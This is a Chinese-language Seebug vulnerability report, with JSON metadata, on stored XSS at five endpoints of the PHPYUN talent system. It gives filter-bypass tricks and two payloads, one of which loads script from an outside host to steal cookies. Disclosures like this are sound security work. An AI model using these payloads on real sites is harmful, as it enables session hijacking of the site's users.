Search...

PHPYUN云人才系统多处存储型XSS打包

2014-05-13T00:00:00

ID SSV:93981
Type seebug
Reporter Root
Modified 2014-05-13T00:00:00

Description

简要描述：

梦见一个getshell，但因为该死的过滤没绕过。。发xss吧。。。多处打包，还不走大厂商吗？

详细说明：

phpyun云人才系统处理富文本时，只在客户端进行过滤，服务端没有进行过滤，导致多个富文本编辑框产生XSS。说一下各个位置。 01.企业用户资料处：member/index.php?C=info 02.企业用户发布招聘信息处：member/index.php?C=jobadd 03.问答系统提问处：ask/index.php?C=addquestion 04.朋友圈发表状态：friend/index.php 05.在线粘贴简历处：member/index.php?C=expectq&add=7 这里提一些点。首先，要绕过360webscan的防御正则，这个好说，只要<img标签不闭合即可。还要绕过一些关键词检查，用16进制的html字符实体替换原字符即可。

漏洞证明：

就拿在线粘贴简历的地方做示范吧。

里面有一个富文本编辑框：

我随便输点东西，然后抓包，修改doc为我的payload：

<img src="#" onerror="alert(/xss/)"

然后提交。一份有xss的简历就生成好了：

给一个加载远程js的exp:

<img src="#" onerror="$.getScript('//xss.com/9WfKui')"

可收到cookie：

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-93981", "status": "details", "bulletinFamily": "exploit", "modified": "2014-05-13T00:00:00", "title": "PHPYUN\u4e91\u4eba\u624d\u7cfb\u7edf\u591a\u5904\u5b58\u50a8\u578bXSS\u6253\u5305", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "", "cvelist": [], "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\n\n\u68a6\u89c1\u4e00\u4e2agetshell\uff0c\u4f46\u56e0\u4e3a\u8be5\u6b7b\u7684\u8fc7\u6ee4\u6ca1\u7ed5\u8fc7\u3002\u3002\u53d1xss\u5427\u3002\u3002\u3002\n\u591a\u5904\u6253\u5305\uff0c\u8fd8\u4e0d\u8d70\u5927\u5382\u5546\u5417\uff1f\n\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\n\nphpyun\u4e91\u4eba\u624d\u7cfb\u7edf\u5904\u7406\u5bcc\u6587\u672c\u65f6\uff0c\u53ea\u5728\u5ba2\u6237\u7aef\u8fdb\u884c\u8fc7\u6ee4\uff0c\u670d\u52a1\u7aef\u6ca1\u6709\u8fdb\u884c\u8fc7\u6ee4\uff0c\u5bfc\u81f4\u591a\u4e2a\u5bcc\u6587\u672c\u7f16\u8f91\u6846\u4ea7\u751fXSS\u3002\n\u8bf4\u4e00\u4e0b\u5404\u4e2a\u4f4d\u7f6e\u3002\n01.\u4f01\u4e1a\u7528\u6237\u8d44\u6599\u5904\uff1amember/index.php?C=info\n02.\u4f01\u4e1a\u7528\u6237\u53d1\u5e03\u62db\u8058\u4fe1\u606f\u5904\uff1amember/index.php?C=jobadd\n03.\u95ee\u7b54\u7cfb\u7edf\u63d0\u95ee\u5904\uff1aask/index.php?C=addquestion\n04.\u670b\u53cb\u5708\u53d1\u8868\u72b6\u6001\uff1afriend/index.php\n05.\u5728\u7ebf\u7c98\u8d34\u7b80\u5386\u5904\uff1amember/index.php?C=expectq&add=7\n\u8fd9\u91cc\u63d0\u4e00\u4e9b\u70b9\u3002\n\u9996\u5148\uff0c\u8981\u7ed5\u8fc7360webscan\u7684\u9632\u5fa1\u6b63\u5219\uff0c\u8fd9\u4e2a\u597d\u8bf4\uff0c\u53ea\u8981<img\u6807\u7b7e\u4e0d\u95ed\u5408\u5373\u53ef\u3002\n\u8fd8\u8981\u7ed5\u8fc7\u4e00\u4e9b\u5173\u952e\u8bcd\u68c0\u67e5\uff0c\u752816\u8fdb\u5236\u7684html\u5b57\u7b26\u5b9e\u4f53\u66ff\u6362\u539f\u5b57\u7b26\u5373\u53ef\u3002\n \n\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a\n\n\u5c31\u62ff\u5728\u7ebf\u7c98\u8d34\u7b80\u5386\u7684\u5730\u65b9\u505a\u793a\u8303\u5427\u3002\n\n\n[<img src=\"https://images.seebug.org/upload/201405/13010819fce50f4a7ca609315835910d99dbd6be.jpg\" alt=\"06.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201405/13010819fce50f4a7ca609315835910d99dbd6be.jpg)\n\n\n\u91cc\u9762\u6709\u4e00\u4e2a\u5bcc\u6587\u672c\u7f16\u8f91\u6846\uff1a\n\n\n[<img src=\"https://images.seebug.org/upload/201405/1301093737f32af0562b4e30cc3fd6c7d7dbcd31.jpg\" alt=\"07.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201405/1301093737f32af0562b4e30cc3fd6c7d7dbcd31.jpg)\n\n\n\u6211\u968f\u4fbf\u8f93\u70b9\u4e1c\u897f\uff0c\u7136\u540e\u6293\u5305\uff0c\u4fee\u6539doc\u4e3a\u6211\u7684payload\uff1a\n\n\n```\n<img src=\"#\" onerror=\"alert(/xss/)\"\n```\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201405/1301114356e8fed268ad8ef82dbdb74449d63680.jpg\" alt=\"08.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201405/1301114356e8fed268ad8ef82dbdb74449d63680.jpg)\n\n\n\u7136\u540e\u63d0\u4ea4\u3002\u4e00\u4efd\u6709xss\u7684\u7b80\u5386\u5c31\u751f\u6210\u597d\u4e86\uff1a\n\n\n[<img src=\"https://images.seebug.org/upload/201405/13011249f9ad9186bb28607e2d50760b7d4bb2ca.jpg\" alt=\"05.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201405/13011249f9ad9186bb28607e2d50760b7d4bb2ca.jpg)\n\n\n\u7ed9\u4e00\u4e2a\u52a0\u8f7d\u8fdc\u7a0bjs\u7684exp:\n\n\n```\n<img src=\"#\" onerror=\"$.getScript('//xss.com/9WfKui')\"\n```\n\n\n\u53ef\u6536\u5230cookie\uff1a\n\n\n[<img src=\"https://images.seebug.org/upload/201405/1301260155f9fc64199f8c33eeb3326b468a326b.jpg\" alt=\"09.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201405/1301260155f9fc64199f8c33eeb3326b468a326b.jpg)", "viewCount": 1, "published": "2014-05-13T00:00:00", "sourceData": "", "id": "SSV:93981", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T17:25:39", "reporter": "Root", "enchantments": {"score": {"value": 1.4, "vector": "NONE", "modified": "2017-11-19T17:25:39", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T17:25:39", "rev": 2}, "vulnersScore": 1.4}, "references": []}